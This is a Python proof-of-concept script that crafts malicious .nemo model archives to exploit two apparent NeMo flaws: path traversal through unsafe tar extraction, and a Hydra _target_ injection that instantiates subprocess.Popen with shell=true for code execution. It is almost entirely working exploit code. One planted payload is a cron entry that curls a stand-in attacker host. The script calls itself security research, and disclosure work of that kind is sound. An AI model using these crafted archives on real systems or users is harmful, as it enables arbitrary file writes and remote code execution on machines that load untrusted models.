""" PoC: NeMo Path Traversal + Hydra _target_ Injection ===================================================== Crafts malicious .nemo files demonstrating two vulnerabilities: 1. Path Traversal: tar.extract() in model_utils.py without _safe_extract() 2. Hydra Injection: _target_ field in config instantiates arbitrary classes Usage: python craft_malicious_nemo.py # Generate both PoCs python craft_malicious_nemo.py --type traversal # Path traversal only python craft_malicious_nemo.py --type hydra # Hydra injection only python craft_malicious_nemo.py --verify # Show archive contents This is for authorized security research only. """ import tarfile import io import os import argparse def craft_path_traversal_nemo(output_path="path_traversal.nemo"): """ Create a .nemo file with path traversal in tar entry names. When model_utils.load_config() or save_artifacts() processes this file, tar.extract() writes files outside the intended directory because _safe_extract() is NOT used in model_utils.py (only in save_restore_connector.py). """ with tarfile.open(output_path, "w:") as tar: # 1. Legitimate model_config.yaml (required for detect_prefix()) config_content = b"""model: name: poc_path_traversal target: nemo_test class_path: nemo.collections.asr.models.EncDecCTCModel """ config_info = tarfile.TarInfo(name="model_config.yaml") config_info.size = len(config_content) tar.addfile(config_info, io.BytesIO(config_content)) # 2. Path traversal entry — escapes extraction directory # When load_config calls tar.extract(f"{prefix}{MODEL_CONFIG}", path=tmp) # the prefix from detect_prefix() is "", so it extracts "model_config.yaml" # But save_artifacts extracts arbitrary artifact paths from the tar, # and a crafted artifact path can escape. payload = b"PATH_TRAVERSAL_SUCCESSFUL - written outside extraction dir\n" # Traversal via artifact name traversal_info = tarfile.TarInfo(name="../../../../tmp/nemo_poc_escaped.txt") traversal_info.size = len(payload) tar.addfile(traversal_info, io.BytesIO(payload)) # Additional traversal — overwrite a more dangerous location payload2 = b"# Malicious cron job\n* * * * * curl http://attacker.com/exfil\n" traversal_info2 = tarfile.TarInfo(name="../../../../tmp/nemo_poc_cron") traversal_info2.size = len(payload2) tar.addfile(traversal_info2, io.BytesIO(payload2)) file_size = os.path.getsize(output_path) print(f"[+] Path traversal .nemo written to: {output_path}") print(f" Size: {file_size} bytes") print() print(" Tar contents:") with tarfile.open(output_path, "r:") as tar: for member in tar.getmembers(): escape = " <-- PATH TRAVERSAL" if ".." in member.name else "" print(f" {member.name}{escape}") print() print("[!] When loaded by nemo.utils.model_utils.load_config():") print(" tar.extract() has NO path validation (_safe_extract not used)") print(" Files are written outside the temp extraction directory") return output_path def craft_hydra_injection_nemo(output_path="hydra_injection.nemo"): """ Create a .nemo file with Hydra _target_ injection in config. When setup_optimization() processes this config, it calls hydra.utils.instantiate() with the attacker-controlled _target_, which can point to subprocess.Popen or any importable class. """ # Config with malicious _target_ pointing to subprocess.Popen config_content = b"""model: name: poc_hydra_injection target: nemo_test optim: _target_: subprocess.Popen args: - "echo HYDRA_TARGET_INJECTION_SUCCESSFUL" shell: true sched: name: CosineAnnealing warmup_steps: 100 """ with tarfile.open(output_path, "w:") as tar: config_info = tarfile.TarInfo(name="model_config.yaml") config_info.size = len(config_content) tar.addfile(config_info, io.BytesIO(config_content)) # Add a dummy weights file to look like a real .nemo weights = b"\x00" * 64 weights_info = tarfile.TarInfo(name="model_weights.ckpt") weights_info.size = len(weights) tar.addfile(weights_info, io.BytesIO(weights)) file_size = os.path.getsize(output_path) print(f"[+] Hydra injection .nemo written to: {output_path}") print(f" Size: {file_size} bytes") print() print(" Tar contents:") with tarfile.open(output_path, "r:") as tar: for member in tar.getmembers(): print(f" {member.name}") print() print(" Malicious config excerpt:") print(" optim:") print(" _target_: subprocess.Popen <-- ARBITRARY CLASS INSTANTIATION") print(' args: ["echo HYDRA_TARGET_INJECTION_SUCCESSFUL"]') print(" shell: true") print() print("[!] When loaded by NeMo and setup_optimization() is called:") print(" hydra.utils.instantiate({_target_: 'subprocess.Popen', ...})") print(" -> Instantiates subprocess.Popen with attacker args -> RCE") return output_path def main(): parser = argparse.ArgumentParser(description="NeMo PoC generator") parser.add_argument("--type", choices=["traversal", "hydra", "both"], default="both", help="Which PoC to generate") parser.add_argument("--verify", action="store_true", help="Show archive contents after generation") parser.add_argument("--output-dir", default=".", help="Output directory") args = parser.parse_args() paths = [] if args.type in ("traversal", "both"): path = craft_path_traversal_nemo( os.path.join(args.output_dir, "path_traversal.nemo")) paths.append(path) print() if args.type in ("hydra", "both"): path = craft_hydra_injection_nemo( os.path.join(args.output_dir, "hydra_injection.nemo")) paths.append(path) print() if args.verify: for path in paths: print(f"=== Verifying {path} ===") with tarfile.open(path, "r:") as tar: for member in tar.getmembers(): print(f" {member.name} ({member.size} bytes)") if member.name == "model_config.yaml": f = tar.extractfile(member) if f: print(f" Config preview:") for line in f.read().decode().split("\n")[:10]: print(f" {line}") print() if __name__ == "__main__": main()